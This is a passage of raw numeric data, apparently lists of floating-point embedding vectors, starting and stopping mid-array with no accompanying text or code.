19398637,0.04529182,0.0032951317,0.0127182985,0.018014954,0.032416504,0.011510024,-0.01107178,-0.028025506,-0.0006029439,0.024599351,-0.01472946,0.000082582854,0.0066389064,-0.0011549002,0.013567014,0.009926339,-0.009856863,-0.034548353,0.01703643,-0.006338288,-0.023686444,-0.0035318672,-0.00516742,0.019330615,0.014345019,0.01682838,0.016682275,0.010887175,-0.007397942,0.004429267,-0.0051491857,-0.012309733,0.010330824,0.042687796,-0.0016917817,0.0012297834,0.0015682579,0.016612222,0.008683203,-0.023710066,-0.0005932817,-0.030263526,-0.026613751,0.038416363,-0.0036031317,-0.0044518127,0.006239071,-0.017836595,0.022197168,-0.0038944753,-0.016722523,-0.0102969725,-0.012087433,0.005245614,0.008938294,-0.009416943,-0.040446464,0.00043620434,0.015952498,-0.015661545,-0.001181694,-0.0038937887,-0.0027351277,0.015891876,0.03412256,-0.010521055,0.00417017,-0.0065466925,0.0016417808,0.028069342,-0.016364645,0.0039398274,0.009825014,0.011086665,-0.012182137,-0.005025085,0.007840016,-0.015571255,-0.007434562,0.0072445055,0.023360163,0.0035988926,-0.01029323,-0.003534425,0.016990978,-0.00414387,0.0056225024,-0.012646111,-0.014757151,-0.0043039583,-0.031568587,0.007584747,-0.022061741,-0.01443151,0.0049053007,0.013831818,0.011926994,-0.0068614944,0.021460928,0.0048275045,0.0054508704,-0.0045753107,-0.011388616,0.008345099,-0.036808208,-0.014666035,0.027865067,-0.002745694,0.023234328,0.017180288,0.019917252,-0.011576352,0.0048756567,0.015724825,-0.00079953845,-0.0022453277,0.0041106823,-0.0031448926,-0.020124074,0.0319657,-0.00505238,0.01188504,0.0066328705,0.0030999212,-0.007989955,0.0015307791,0.0054554893,-0.0029972445,-0.022712506,0.0026826018,-0.0070211985,-0.002892519,-0.020288646,0.0035050302,0.0068646655,-0.009475925,-0.038923834,0.006015339,0.016729865,-0.000037164456,-0.004836148,-0.0019183998,0.011956401,0.004760699,0.0029131644,-0.004554728,0.009129126,-0.012861518,-0.0022764439,0.011886454,0.011196707,-0.02208525,0.0011757601,0.013203879,0.0030526728,0.0021270288,0.022912862,0.0006289327,0.009183401,-0.014553704,0.0025984445,-0.0065977713,0.04437735,-0.015070683,0.01986531,0.0003303614,-0.003984426,0.03179592,0.0080490075,-0.03994356,0.039870255,-0.021011105,-0.053917218,-0.013861513,-0.004184615,0.0021310032,0.005142027,0.015375352,-0.022764187,0.0031139383,-0.019598419,-0.024079274,0.0040690205,0.008746107,0.010632443,-0.011718387,-0.029784774,-0.0015135253,0.0074141575,-0.013746616,-0.00864338,-0.016994156,0.0011396359,-0.0038429706,-0.007306387,-0.007981551,-0.0004594714,-0.006090199,-0.031644203,0.0035366437,0.016295686,0.0037980324,-0.002374675,-0.0022659164,0.013708186,-0.010823168,-0.01165756,-0.0025118347,-0.015052629,0.017993877,0.012052837,-0.007376828,-0.00946344,-0.004062744,-0.004654734,-0.0053297454,0.012920062,-0.0085673295,-0.016556973,-0.01231437,-0.024102103,-0.026717667,-0.029814182,-0.018556576,0.011216952,-0.036374338,-0.009847372,-0.03097288,-0.004127709,-0.0068323947,-0.0013068494,0.010412314,-0.017075706,-0.009114802,0.014971209,0.016033655,-0.0047662486,0.007038342,-0.00552176,0.021927124,-0.016448215,-0.016067509,-0.013736039,0.01130783,-0.012602495,-0.020194843,-0.02348913,-0.009913475,0.022183048,-0.015229891,0.0078434255,-0.015255039,0.017002339,0.005464207,-0.034670714,0.019953806,-0.03616824,0.00804517,0.004666889,0.021800835,0.01870206,0.042375326,-0.032410312,0.0037987528,0.049805086,-0.016704893,-0.018623987,-0.005706249,-0.023316925,-0.08225089,-0.0258201,0.04194567,-0.012849271,-0.018295372,-0.014245218,0.019747503,0.00023107658,-0.014185259,-0.0069191414,-0.011860169,0.005950741,-0.0036247806,0.027789993,-0.0040023546,0.0015374189,0.006978957,-0.0047348463,-0.0011115774,0.012031819,0.0037842805,0.0045113745,-0.0009979983,-0.0027679845,0.016247958,-0.012451996,-0.0020056623,0.012235049,0.008355051,0.0025487377,0.0248232,-0.029317344,-0.021561945,-0.030763742,0.008540137,0.009874047,0.0067670145,0.008980697,0.008137764,-0.0037172157,-0.01061393,0.15950717,0.011524089,-0.015854448,-0.0037521655,0.0049317116,-0.020088067,-0.0049657715,0.013408604,0.0007107216,0.030521099,-0.005546673,-0.008873842,-0.009782923,0.012084552,0.01518014,0.0009803671,0.0026173175,0.16396374,0.010474364,0.0048010815,0.03209713,-0.009411688,0.024011118,0.010206465,-0.01462996,-0.062910154,0.005948813,-0.018324206,0.02057548,0.007291574,-0.011775134,0.006941972,-0.0029631553,-0.008448377,0.0067288266,0.01522798,0.0050286716,-0.013075656,-0.04274446,-0.016209088,0.013611916,-0.024178663,-0.007075628,0.0013362234,0.0023180705,0.016220875,-0.010748227,-0.01595272,0.006120133,0.038668003,0.023170192,-0.013612038,0.015659787,-0.028906608,0.014476163,0.007535377,-0.0074775,0.013990649,-0.031201366,0.010415205,-0.0050714132,-0.0004927844,-0.024467796,0.019003775,-0.0147090675,0.0071292464,-0.015073205,-0.013767998,0.0033802118,0.0011616799,0.0052434937,0.013825769,-0.016471418,0.0065389136,0.014911152,0.032553215,-0.011506934,-0.0069079143,0.003358556,-0.008079155,0.011188562,0.030855685,-0.012436425,0.00042758114,0.0059948694,0.015674341,-0.00067883683,0.019696241,0.009998686,-0.0040856022,-0.017771073,0.008777872,-0.0016483517,0.0022284316,0.0013038649,0.019253168,0.0011972898,0.0022135298,0.0028185265,-0.024579706,-0.003528078,0.010585189,0.0014190287,0.01092632,0.00062443234,0.0056973067,-0.0016512378,0.0008642111,-0.0023532961,0.004394314,0.026723556,0.004277773,-0.014919779,0.008622742,-0.0152153075,-0.013756127,0.005043513,0.017591218,-0.027382197,0.009111391,-0.0073746196,-0.022439508,0.017882708,0.0038813802,-0.030617403,-0.015965778,0.004770063,-0.0068418914,-0.02836204,0.0069014435,-0.012421446,0.0021761765,0.0063842866,0.0051043676,0.016684968,-0.0033576007,0.009428167,-0.01513382,-0.008250316,-0.006268136,-0.00009506377,0.0038445531,-0.0030046077,0.008298195,0.001618887,0.005317249,0.016656855,0.005832224],[0.003894184,-0.014407305,0.018997306,-0.0110736815,0.014979229,0.0029293254,-0.010024212,0.009543281,0.011219709,-0.0031674348,0.012571059,0.012484536,-0.022377586,-0.012493114,-0.005834715,0.0054642376,-0.023159174,-0.008885868,0.017858533,0.00063655234,0.002396372,-0.021201946,-0.008047109,0.006536442,0.0042266194,0.007462382,0.0118006505,-0.0038065447,-0.009330484,-0.005524539,0.00515041,0.009638906,-0.0054487465,-0.010024648,0.011251947,0.008620772,-0.010228799,0.0044756443,0.002368153,0.0050635035,0.008540852,0.00642782,0.009202643,0.026153082,-0.036021713,0.0032187074,-0.0151633965,-0.002612197,-0.0030486693,-0.010238196,-0.00078102725,-0.0072612083,-0.015675941,0.01646633,-0.001829706,-0.008760353,-0.0049657477,-0.022334585,0.008603219,-0.0054256716,-0.00865311,0.013634008,0.00016512118,0.004635627,0.031824775,-0.017377438,-0.0031552808,-0.012885207,-0.010493232,-0.014410429,0.02829437,-0.009788933,-0.018562589,-0.0042742183,-0.0047317725,0.015776869,0.009253845,0.0067922864,-0.0057187607,-0.0036218534,-0.022113197,0.0043990915,0.01081628,-0.021574851,0.014762684,-0.011799152,-0.00668714,-0.0012872556,0.0062780757,-0.005185765,-0.032827064,0.01632506,0.007834022,0.015608715,0.012593416,0.04407231,0.034606252,0.0007789786,-0.0068553532,-0.017203718,-0.024769517,-0.01265256,-0.018204724,0.0013253249,0.002616803,-0.011611286,-0.005072516,0.012556381,0.0024773614,0.0075574624,-0.0037020876,0.009135497,0.0022079335,-0.00054623827,0.017330628,-0.027947593,0.007964024,0.015504512,0.012920095,0.0066540223,-0.0147375055,0.0024833232,0.028465409,0.014993672,-0.011741191,-0.017507156,0.001938753,-0.0022000805,-0.011162495,-0.01369555,-0.012952065,0.030872922,-0.0030731838,0.0063355365,-0.0060168956,0.003966439,0.00443422,0.004249067,0.017036136,-0.02039617,-0.000760802,0.023441335,0.01234869,0.012163353,0.010193512,0.010838507,-0.0022356857,0.013875189,0.00839366,0.011553734,0.012828365,0.013605772,-0.0074337027,-0.018569948,-0.001751817,-0.008779239,-0.014030341,-0.012200863,-0.011898555,-0.0005600524,-0.0060288496,-0.009617045,-0.003619741,0.017987305,0.0007093397,-0.008036876,-0.008047323,0.008821996,-0.007927355,-0.019152317,0.024442468,0.003246567,0.015675694,0.014859147,-0.0029126313,-0.0005226454,-0.00025182564,-0.008126421,-0.008677476,0.019237146,-0.020910487,0.031059243,-0.0013110228,-0.017209595,0.0057185646,0.006414266,0.01767689,0.009784618,-0.0052584484,-0.004124634,-0.007288623,0.017777368,-0.006559134,0.009723153,-0.012168312,-0.015252732,-0.0017132768,0.115390725,-0.008240069,-0.014999928,-0.019530011,0.0030139815,-0.008628002,-0.0011198125,-0.0050741713,-0.010750103,-0.012160084,0.017872756,0.009173603,-0.012918482,-0.0015875314,0.007079971,0.038841214,-0.010060618,0.0036110827,-0.08935673,-0.0012440301,0.027949408,-0.02566429,-0.00468468,-0.0021227503,0.011600701,-0.012936255,0.009060816,-0.031587735,-0.0035595936,0.023998594,-0.016939595,0.00773953,-0.036355183,0.029745346,0.020201609,-0.055793025,-0.01346759,-0.015851622,-0.022803871,0.024652109,-0.0057778535,0.0027757038,0.0057026865,0.008926082,-0.0018548494,0.003287656,0.0042951684,-0.018582223,-0.009178206,0.010488348,0.013996008,0.010188926,-0.0071077743,-0.0113348765,-0.014670734,-0.011632735,0.027970135,-0.0054264446,0.0012496461,0.00013576231,0.018567404,0.003899863,0.004111629,0.015043674,0.04393353,-0.022752993,0.021729304,0.019111173,0.023332145,0.022389803,-0.028714538,-0.01738035,0.012544326,-0.042977594,0.003384031,-0.0013684015,-0.031531487,0.022749975,0.00763051,0.018661566,0.006027515,0.020209996,-0.0068998765,-0.00686019,-0.011245285,-0.012477533,-0.023571167,-0.026770778,-0.012325369,0.02366373,-0.006689479,0.01856398,-0.03164065,-0.0091432845,-0.0044219,0.032315392,0.008304696,0.021589065,-0.018290326,-0.02277227,0.014635037,0.006057167,0.00833992,0.0021520634,-0.0046912143,0.031032708,0.017325127,-0.023322238,-0.013581014,-0.0082086045,0.035831094,0.007136041,0.008236326,-0.0058802925,-0.008665335,0.0021767928,0.009686728,0.013311628,0.000013501091,0.005637085,-0.0030293406,0.0030301546,-0.003967777,0.010542851,0.0035915384,-0.023385806,0.0011147126,-0.036883913,-0.024504505,0.03713322,0.014125913,-0.004144051,-0.002548536,0.00262531,0.003945145,-0.0029061295,0.0044236495,0.008761108,0.0042865006,-0.0060725487,0.011800675,-0.0073933457,0.0050713727,-0.008233141,-0.010345003,-0.008996602,-0.000767837,-0.0055677933,-0.012885984,0.003407273,-0.019282121,0.024616286,0.013259427,-0.0032756052,0.015770707,-0.014933378,0.014983054,-0.0020100859,-0.005755912,-0.00026441543,-0.006990249,-0.016323743,-0.0049214973,0.025938058,-0.00669943,0.0057926234,-0.0041748113,0.044515952,-0.0043920865,-0.03041126,-0.020552652,-0.0342982,-0.018350322,0.0057333997,0.022314303,-0.001462783,-0.013046621,-0.028110242,-0.025683273,-0.008521475,0.041820835,0.021316668,0.0191002,-0.035960022,0.0093265455,-0.009671922,-0.0024071264,-0.0072186687,0.0069707343,-0.035028968,0.012826445,-0.006129501,0.020061074,0.0020219493,-0.0063451533,0.013533482,-0.020170333,0.013072415,-0.021967739,-0.008608585,-0.003358699,-0.02404566,-0.004784411,0.016789485,-0.002222878,0.0029036596,0.01069979,-0.00037181875,0.013540847,0.0047262767,0.033381276,-0.0155891115,0.0038286052,0.003665879,-0.0041972883,-0.0022981868,-0.0056297127,0.013764442,0.00053598924,-0.007305175,0.015611143,0.012120589,0.00034838254,0.008620057,-0.024002021,-0.0063152486,0.013585042,0.012529873,0.012106496,-0.022568064,0.008319851,-0.0027448689,0.017168459,0.010967958,-0.0049663405,0.0050308458,0.012491212,-0.025058817,0.0067743915,0.023586495,0.0062094983,-0.022249416,-0.013348442,-0.008101758,-0.019024942,0.00020325827,-0.002271542,0.006150926,0.029059863,0.004486923,0.01927939,-0.015545869,-0.0036671509,0.009119273,0.0077027217,-0.0009452122,0.0069733188,0.015057169,-0.0009262835,0.03938812,-0.0008489322,0.029235007,-0.011722127,0.022295926,-0.01965826,-0.012157823,0.024538869,-0.012675118,0.017619124,0.0046968306,-0.0038818303,0.002519403,0.0066663744,-0.01512356,-0.019037925,0.001020811,0.018802617,-0.004117859,-0.0035505954,-0.019348199,-0.0027843404,0.0022446855,-0.022385966,0.016322827,-0.024211792,-0.011388399,0.018828284,0.029095778,0.002908581,0.0065987557,0.020552212,-0.0017849823,0.0149626,-0.0040778816,-0.0077638645,-0.006156866,0.014519492,-0.008717588,0.033067994,0.01656959,-0.03238326,-0.010546667,-0.0018047069,0.013202105,-0.012224605,0.024603494,0.0009527562,0.026653433,-0.0039972686,0.027128885,0.008852717,-0.013014913,0.022961091,0.012868769,0.006738595,0.0052038594,-0.007899658,-0.0038944206,0.0086723305,-0.004569294,-0.0039877803,-0.0072206063,-0.012348716,-0.0011141435,-0.024370354,-0.023084285,-0.016726382,0.042794272,-0.003138383,0.0048077386,-0.030034037,-0.0080441125,0.0077713896,-0.00186664,0.08475325,-0.0015476636,-0.012058766,0.004602032,0.005979109,0.025314037,-0.008306841,0.003411053,-0.016580705,0.033712357,0.022632282,0.0014640784,0.002475894,0.021260077,-0.0224434,-0.011756501,0.014431679,-0.01756417,-0.007746386,0.006044403,0.027016675,-0.0026749342,-0.01316383,-0.020932907,-0.014771124,-0.010404614,0.026955742,-0.01449941,-0.005787403,0.016658848,-0.027463047,0.0040615015,0.001479504,-0.01736651,0.024409581,0.00435813,-0.0035392072,0.005185011,0.0010181117,0.01230622,0.019830734,0.008795313,0.020961672,0.020626694,-0.0068722335,-0.021013102,-0.013491245,0.012532635,-0.00080368505,-0.017368246,-0.018639235,0.017266983,-0.007637467,-0.0011945767,-0.0116092125,-0.010805416,-0.002749701,0.014583991,-0.020007081,-0.0008604305,0.013763184,-0.010757192,-0.017648607,-0.025800027,-0.01279387,0.00042124002,0.00055009493,-0.013935945,0.004719732,-0.003957437,0.005857125,0.012972659,-0.0020317566,0.003368517,0.012426901,-0.006320097,-0.004244986,0.016814627,0.011839569,-0.0027693028,-0.0017952324,0.0010726288,-0.0010404438,-0.022529498,-0.02027555,0.007593437,-0.021162456,0.010160737,0.014310274,0.0024942886,-0.002020791,-0.0008485223,-0.0099370675,0.004382203,-0.0068435264,0.0045295716,-0.010393027,0.005712598,0.00059329486,0.001970405,0.0047307448,-0.01612283,-0.030184928,0.03879338,-0.010549605,0.022307977,-0.008977385,-0.0059412997,0.01737391,-0.026935024,0.008583026,-0.082906425,-0.003542171,0.020061404,0.032915827,-0.0019962958,0.035319883,-0.0065679625,0.038789205,-0.005559799,-0.036989197,0.013504115,-0.0034445631,0.0070456616,0.00954355,0.033399686,-0.02092575,0.0045990623,-0.018015547,0.009790831,-0.06843608,-0.008024324,0.002701915,0.00087131443,0.009888544,0.010065544,0.018071076,-0.0013299482,-0.0064296043,-0.012943418,-0.005018791,0.038120568,0.009969233,0.029152287,0.003851928,-0.035660528,-0.015468334,-0.0060697095,-0.009959919,0.0039063734,-0.006932522,0.007738741,-0.0039242986,-0.011423836,-0.007087982,-0.0053638946,0.017818717,-0.041482847,0.0011369414,-0.032617506,0.020244451,-0.0038792358,0.015118632,-0.01605222,-0.0014839811,-0.0026318305,-0.0036438839,-0.015541832,0.02613033,-0.023088548,-0.012187447,-0.00719524,0.025899239,0.00093376206,-0.0026903138,0.020898836,0.016401194,0.014422111,-0.018810846,-0.009525321,0.0028245987,-0.011743498,-0.0022725132,0.027018357,0.016737752,0.0015766465,0.00876345,-0.0010937136,-0.0069569377,0.0063732485,-0.01435674,0.016099278,-0.03383062,0.0055720313,0.010773354,0.0074135317,-0.020715546,0.0142621165,-0.020379577,0.009037729,-0.015400628,0.00814601,-0.0035533141,-0.0060381996,0.0034591344,-0.023291571,0.0013370666,0.011593867,-0.018379878,-0.024367535,0.042651292,0.013049736,0.009127032,-0.025218057,-0.028797971,-0.0103963185,-0.015564748,-0.017196523,-0.024331195,-0.010668504,0.04946215,-0.012076794,0.041246787,0.009876463,0.010249677,0.02156219,0.01685664,-0.011146552,0.0042525805,-0.00907058,-0.019221837,-0.0009627881,0.011513045,0.0066228006,-0.02204883,-0.008209609,0.005329376,-0.0002444718,-0.012892917,0.008642844,0.017260574,0.008745481,-0.01550911,0.018126085,0.010377495,-0.015196477,-0.031041762,0.0040553235,-0.020906294,-0.013141375,-0.005001239,-0.002279627,-0.03672536,0.0069370004,-0.008427408,0.022489116,0.005988225,0.01878306,0.008574911,-0.0027180915,0.0011020907,0.011817853,-0.0073452992,0.0057654236,-0.036429085,-0.032012206,0.028203532,-0.02155989,0.010861061,-0.008855459,-0.007912836,-0.026680501,-0.010135647,-0.0039223507,-0.0080622,-0.002651257,0.0011503571,-0.024943126,0.018620405,-0.00807045,-0.00013058029,0.00877221,-0.008614917,0.0007265191,0.0019746297,0.0106142545,-0.015704626,-0.035401724,-0.0098428195,-0.008825132,-0.010034391,0.0006166888,-0.028344914,-0.020306345,0.012035821,0.0047423583,0.00069409667,0.017590398,0.0014469931,0.013459476,-0.0060970993,0.019611835,0.011178825,0.013508125,-0.03400938,-0.008058242,-0.022182208,0.005625969,0.030422647,0.030420076,0.0012748913,0.024097543,0.00027091886,-0.02852359,0.0023954345,-0.0025230122,-0.011869601,-0.0029453186,0.0076958383,0.002780651,-0.021635557,0.007199948,-0.000808505,0.012830818,0.00026938692,0.008705576,0.0071262536,-0.00754585,-0.021577716,-0.0027836787,-0.00087897904,0.0007739362,-0.01128656,-0.0012961056,-0.000025526906,0.005444325,-0.012841214,0.008964091,-0.012168157,-0.009339369,0.02047139,0.0012346745,0.0059779114,-0.016064586,0.0041333917,0.006300211,-0.009707789,0.017253773,0.012787727,-0.005071117,0.0004402884,0.0053511234,0.03656026,-0.02903608,-0.0028195584,0.0032427807,0.0033382361,0.0060104458,0.0088842865,-0.010274689,-0.02828998,-0.011598393,-0.022035493,-0.00057310314,-0.023772728,0.007571856,0.014161642,-0.019172633,0.005982018,-0.00575482,-0.011100744,0.021203963,0.031881604,-0.01538509,-0.005964168,-0.008949471,0.023229117,-0.010147879,0.019952964,0.015602801,0.02510543,0.004002799,0.032589283,-0.0017055178,-0.004240462,-0.024587331,0.014990446,-0.028667172,-0.009513976,0.01875744,-0.0074217985,-0.00010001282,0.015123713,0.0039632563,0.005593841,0.0165939,0.0029735244,0.003432099,0.011738731,0.016564334,-0.008370334,-0.0077061737,0.010647332,0.008534545,-0.0028869007,0.011919768,0.013031607,-0.06722849,-0.0015047505,0.0042123394,0.007230766,0.0033825526,0.028479647,-0.0134439785,0.0031234561,0.03578532,-0.012217188,0.020588413,-0.009644937,-0.00024484826,-0.016837062,0.01804092,-0.014515873,-0.01854114,0.0010745443,0.025796507,-0.012388523,-0.037112057,0.0048613185,-0.0014033853,0.016699215,0.017099649,-0.01976538,0.0114649935,-0.0068517704,-0.003400325,0.012587847,0.029884951,0.014999317,-0.007241023,-0.0016743118,0.00022711563,0.0011652985,0.006828247,0.0009150146,-0.017915137,0.005799933,0.0019821231,0.01703245,-0.0050331578,0.021640578,-0.01657987,0.00083216,0.005110138,-0.018806292,-0.0034984807,-0.029321963,0.010039203,-0.0010751899,-0.017281879,-0.010559662,0.012986554,0.02316129,0.005818669,0.008593413,0.02170256,0.0014944823,0.0023973908,-0.0013972481,-0.0072241584,0.028707245,-0.033340722,-0.0070884665,0.016307194,0.007588446,0.0053076507,-0.009560885,-0.022246659,0.013923374,0.006126238,-0.023247145,-0.004120509,0.027552914,0.018580431,0.0018794297,-0.0050373147,-0.02754623,0.004738141,0.0021202108,-0.021021837,-0.00091782195,-0.042045303,0.017736843,-0.0062858765,-0.0017969663,-0.018178262,-0.007426532,-0.0014166656,0.014303455,-0.013822197,0.000614014,-0.006115574,0.034683954,0.013603415,-0.0020513977,-0.000013376988,0.014351596,0.030795457,-0.004105652,-0.005412776,0.021629367,-0.018163774,0.00050478516,0.0010495442,-0.009686529,0.02031964,0.019025514,-0.0032835999,-0.0008947042,0.00792003,0.0010520698,0.0036218518,-0.0016595991,-0.0149272755,0.024599062,0.030947356,-0.0056244233,0.0029453703,0.010093885,-0.0016344372,0.0049408455,-0.0023266955,0.013224785,0.027878327,-0.012127069,-0.03678218,-0.00053786795,-0.0064498736,0.010923819,-0.03991688,-0.008143867,-0.007022001,-0.01817564,-0.023572002,-0.009982875,-0.01636046,0.006405457,-0.0068027223,-0.006449292,-0.035133615,-0.0056746076,0.005569596,-0.0070935143,-0.018162021,-0.010016974,0.006620894,0.012351789,-0.00013944034,0.016790207,0.0058520045,-0.00030299602,-0.01012141,-0.0039733276,0.0019022265,-0.026370792,0.016939528,-0.010382771,-0.02475519,-0.0361441,0.011562787,0.002714209,-0.023137342,-0.008101845,0.012281807,0.0018105643,-0.009415735,-0.008353441,0.008139425,0.011293492,0.0015973714,0.013262261,0.0038132453,0.0010790551,0.023096282,-0.012037568,0.0014070759,0.015446185,0.019127648,0.009924288,-0.02136383,-0.010543027,0.010365814,-0.02102404,-0.0027023195,-0.007836486,-0.013549147,0.0016156468,-0.014260099,-0.0012948171,-0.003915847,0.00080769014,0.0014542972,0.0025589522,0.004416614,-0.005167608,-0.0013883295,0.014883057,-0.0046648853,0.01776167,0.013884356,0.007785811,-0.022497335,0.015701158,0.028213104,-0.0099361865,-0.010867848,-0.027996281,-0.0027956138,0.0018274726,-0.026849281,0.00048018413,0.013978231,-0.004194972,0.0076502846,0.028577702,0.014250089,-0.016117437,0.032407403,-0.018817196,0.0069798585,0.0059064683,0.0053203423,0.011221529,0.0104597155,-0.0133322785,0.0128445,-0.0068962974,0.012591085,-0.03241039,0.029935144,0.00803149,-0.012057798,0.014992918,-0.0047894707,-0.0020085124,-0.0062538916,-0.020600375,0.017772542,0.017124627,0.006345716,0.015497132,-0.0013576419,0.03576349,0.015346161,-0.012964841,-0.008698597,-0.00083394925,0.0045688422,-0.00021042272,0.0062898584,0.00025477164,-0.00817959,-0.016557863,-0.013434566,-0.015475978,-0.0068066907,-0.012282733,0.0047487062,-0.022626996,-0.003776026,0.005848674,-0.0076722354,-0.0017226839,0.027309697,-0.003027731,0.011423156,-0.014128818,0.009368136,-0.015174701,0.005403586,0.019893792,-0.015271491,0.0041827913,-0.0045966604,0.008993157,0.011044546,0.0018104876,-0.0016202771,0.008536158,0.011515561,-0.014380885,0.0046407576,0.01467859,-0.005811817,-0.018792536,0.033460412,-0.012006304,0.0062393937,0.0013869178,-0.0012289806,0.026559288,0.028521614,-0.016544743,0.005529389,-0.023976075,-0.0075979633,-0.014421399,-0.017016446,-0.012024629,-0.00045098137,-0.02992294,-0.010055777,-0.0037759745,-0.004342159,0.00038120124,0.023751512,-0.004116388,-0.011252717,-0.030955702,0.0043151546,-0.05117392,0.0076179425,-0.010191634,0.012479282,-0.0019964506,-0.01707684,0.0051815473,0.0033176297,0.0053104046,0.0010305898,0.010653192,-0.0052013826,0.02675018,-0.012956212,0.0032210809,-0.0019386031,0.014867289,-0.008875518,0.0044994135,0.0017431352,0.020271474,0.0024843775,-0.0024010532,0.00842555,-0.017511075,-0.0031849747,0.016035913,0.00717581,-0.023693562,0.075141326,-0.0128833,0.006036969,0.0071233017,-0.017666807,0.03385114,0.0024733113,0.0029119786,0.015417751,-0.0016822426,-0.008736031,0.003222809,-0.0069966107,0.014571001,-0.014917396,0.011943223,-0.010696121,0.012194192,0.012820725,-0.015446616,0.0031241167,0.0071299598,-0.0035362775,-0.010954712,-0.011631231,-0.012233391,0.02124561,-0.0205567,-0.011905888,0.0037975856,-0.00463125,-0.015500186,0.00578016,0.011706873,0.021972684,-0.022348704,-0.001418419,-0.010574987,-0.012381886,-0.018879864,0.0350058,-0.0025267575,0.0010459186,0.015271913,0.02007834,-0.0201555,0.07613842,0.011647543,0.01624728,-0.0057498678,-0.006593306,-0.0021888586,-0.0011911783,0.012560517,-0.0039230674,0.014745873,0.012207806,0.02272383,-0.0040465035,0.018848643,-0.0036855193,-0.00810767,-0.010030294,0.011189434,-0.012959126,-0.03075028,0.0012954234,0.015506526,-0.00902937,-0.011263793,-0.013106559,0.026580255,-0.005379628,0.02345168,0.005178976,-0.015323062,-0.011526562,0.0046331603,0.0058272476,0.037182514,0.0055103065,-0.07232654,0.01690149,0.20214504,0.009294653,0.020438455,0.01565588,-0.008219688,-0.0151224015,-0.10952691,0.010408121,-0.020600598,0.003962353,-0.013014885,-0.0068608173,0.0003340735,0.023779618,0.0067458553,0.008207398,0.015067232,-0.037221923,0.00030174555,-0.014128371,0.009403247,-0.0032626342,-0.0103186425,0.033000097,-0.029224532,-0.010795458,0.025368564,-0.022985095,-0.01359107,0.017039768,0.0015511509,-0.00018710922,-0.0038321207,0.012279491,-0.0364697,0.0021637394,0.012294957,-0.02247914,0.004691316,-0.023742594,-0.0073794387,0.00067667535,-0.027284415,-0.016664997,-0.13592371,-0.008563251,0.0072043547,-0.009592973,0.0067500724,0.021475798,0.028615301,0.002990942,0.008761671,-0.017983438,-0.00017006595,0.0070394953,0.013586398,0.004203613,0.009096139,0.009834915,0.008494855,-0.014366057,0.0086747,0.0039100507,0.0139671005,-0.023211699,-0.02680066,-0.015472976,-0.0015687196,-0.00695341,0.0030305204,0.031250335,-0.0007216944,0.011878836,-0.00989958,0.030356761,-0.014380292,-0.0008991994,-0.030215923,-0.016195929,0.008977351,0.01373671,-0.019314395,-0.0077423393,0.018998705,-0.0060038646,0.001355517,0.028814789,0.006898378,0.013383511,-0.000053358213,0.0202978,-0.013373519,0.009523217,0.022978695,-0.0018710874,-0.0058488636,0.0031102672,0.008763589,0.009010855,-0.022012461,-0.017686225,-0.008115982,0.005789102,-0.00696196,-0.013260335,-0.0046911994,-0.025047343,0.006094249,-0.0063865576,0.014339506,-0.043067142,0.001486102,-0.015060004,-0.001867243,0.0077267564,0.010872143,-0.014805154,0.0017474936,0.0014294123,0.00567847,0.0023709645,0.005653365,0.007988045,-0.019580824,-0.03436252,0.008136753,-0.01508203,-0.0004857346,0.0011763703,0.016781406,-0.009942215,-0.0004386321,-0.00024971302,-0.004011903,0.00029018143,0.04654894,0.014303114,-0.0015177198,0.00869117,0.026642883,-0.01751697,-0.029214067,0.016310994,-0.002415948,0.01755572,-0.017837245,0.009582688,-0.022748219,0.011340848,0.00171274,-0.0016825526,-0.014584301,-0.004146271,-0.021841075,0.025496496,0.0019399162,-0.0025126834,-0.00067530735,-0.0405632,0.00678372,-0.0007451106,0.0018823572,0.014729771,-0.024759082,-0.009479558,-0.015256234,-0.005332962,0.02005271,0.0008765595,-0.013500206,-0.0012069277,-0.004075418,-0.02554406,0.012133427,-0.0016403943,0.0012711087,-0.0061166203,-0.0015847768,0.006814744,-0.0067780274,-0.02978676,-0.010551315,-0.002119378,0.024741521,-0.016236657,0.012669105,-0.019543756,0.015979497,-0.007785534,-0.019189587,-0.021769652,0.002680664,-0.023292834,-0.01392308,0.039209045,0.009565526,-0.021924026,-0.00033239115,0.087511234,-0.025919778,-0.033422157,-0.013473873,-0.0034710336,0.0025625136,0.023808196,-0.021322092,-0.0058805533,-0.016634617,-0.048352562,-0.004459324,0.007068146,0.014439437,-0.0056995573,0.04215225,0.005998695,0.012225257,-0.0016585775,-0.009395395,0.020875428,-0.020880954,-0.0073983693,0.030733058,0.009688557,-0.012327,-0.005427279,0.002016011,-0.019030072,0.01834038,-0.0013690862,-0.0007866619,-0.011949748,-0.005705346,0.003173045,-0.042364065,-0.023081902,-0.003812801,-0.003013286,-0.023509853,-0.008102448,0.011625675,0.0004372868,-0.007910972,0.034434102,0.015113023,0.00064195326,0.0063269977,0.021371886,0.008618273,-0.003812307,0.0015596508,0.02915065,-0.014039418,0.00026264312,-0.033532687,0.023892304,0.0051325206,-0.008530399,0.009894755,0.013072026,-0.021007828,-0.0012265018,-0.011583896,-0.023639746,0.02939776,0.008727927,0.0047794594,0.0012003477,0.025661955,-0.0059590642,-0.00928943,-0.0037615488,0.01821456,-0.012088881,-0.0014916701,-0.023604818,-0.025411008,-0.03736305,0.003382251,0.023179179,0.028786205,-0.012344074,0.029880824,-0.018939499,-0.068704955,-0.002338304,-0.0060021114,-0.019769074,0.015765797,0.015424886,0.0067758868,0.016473524,0.013051564,0.023963857,-0.017356612,0.0010158469,0.0012169147,-0.014555965,-0.0097223595,0.021066207,0.017456688,-0.0069668274,-0.009656566,-0.009808294,-0.033589967,0.010652079,-0.013156536,0.0018671692,-0.008040587,0.0017569789,0.0149963675,0.022645403,-0.013925972,-0.0007031452,0.028679244,-0.004287679,-0.010852505,0.012395732,-0.012803222,-0.03030738,-0.020641873,-0.006058377,-0.008688592,0.022254674,0.017883407,-0.026538769,0.013077998,-0.0040595816,0.018714331,-0.0028154354,0.027323104,-0.024066333,0.0032864502,0.02002781,0.00584907,0.022376182,-0.008328598,0.0068644253,-0.001993695,-0.008112315,0.021726195,-0.007186425,-0.021871606,0.014181162,0.004207868,0.017145852,0.009759058,0.0022076296,0.011972386,-0.01648067,-0.0034847625,0.00011300088,-0.02112906,-0.000104642255,0.020233992,-0.004712173,0.0014224243,0.008527017,-0.0064304015,-0.011604437,0.02923276,0.013125876,-0.01566312,-0.02127277,0.015383846,0.041994635,-0.02246669,0.0087997485,0.0018364856,-0.021348333,-0.021093477,0.01682802,0.0010936805,0.017882917,0.004292267,0.025479265,-0.022654528,-0.023560904,0.00039794177,0.02264587,0.0074866614,-0.027627585,0.0016572003,0.012285563,-0.013772207,-0